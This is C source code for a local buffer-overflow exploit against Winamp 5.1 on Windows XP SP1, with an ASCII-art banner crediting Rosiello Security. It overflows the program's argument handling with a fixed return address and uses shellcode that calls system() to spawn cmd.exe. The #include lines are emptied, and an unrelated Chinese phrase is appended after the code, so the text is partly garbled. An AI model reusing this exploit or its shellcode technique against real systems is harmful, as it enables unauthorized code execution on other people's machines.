/* * Copyright ?Rosiello Security * * http://www.rosiello.org * * * Winamp_5-1_ex.c (Windows XP Pro + sp1) * ____ _ _ _ _ _ _ _ * | _ \ ___ ___(_) ___| | | ___ __ _| |_ _| || |_/ | * | |_) / _ \/ __| |/ _ \ | |/ _ \ / _` | __| |_ .. _| | * | _ < (_) \__ \ | __/ | | (_) | | (_| | |_ |_ _| | * |_| \_\___/|___/_|\___|_|_|\___/ \__,_|\__| |_||_| |_| * * * ---[ @Wizard@ local Winamp V5.1 exploiter ]--- * * * In December of this year (2003) a good friend of mine "b0f" reported this bug in an advisory * at www.b0f.net * * (BUG:) * * There is a simple Buffer overflow in argument handeling routine for Winamp version 5.1. * * * * just type: * * * C:\\Progra~1\\Winamp\\winamp.exe AAAAAAAAA....[517 chars]...AAAAAAAAAAAA * winamp.exe will crash * * * This bug was never exploited so that was my quest. * * The shellcode requires * * system (msvcrt.dll) * * AUTHOR : Johnny Mast * CONTACT: rave@rosiello.org */ #include #include #include #include #include #define SYS_ADR "\x44\x80\xbf\x77" #define EIP "\x80\xd4\x12\x00\x00" char shellcode[]= "\x90\x90\x90" "\x90\x90\x90" "\x90\x90\x90" "\x90\x90\x90" "\x8b\xec" // mov ebp,esp "\x55" // push ebp "\x68\x65\x78\x65\x20" // push "exe " "\x68\x63\x6d\x64\x2e" // push "cmd." "\x8d\x45\xf4" // lea eax,[ebp-0xC] "\x50" // push eax "\xb8" SYS_ADR // mov eax,77BF8044h "\xff\xD0"; // call eax int main(void) { FILE *fd ; char buffer[1024] ; char whoops[1024 *2]="C:\\Progra~1\\Winamp\\winamp.exe "; int i ; memset( buffer,0x00,1024 ) ; memset( buffer,0x41,260 ) ; strcat( buffer,EIP ) ; execlp(whoops,whoops,buffer,shellcode,NULL); }

亚洲欧美在线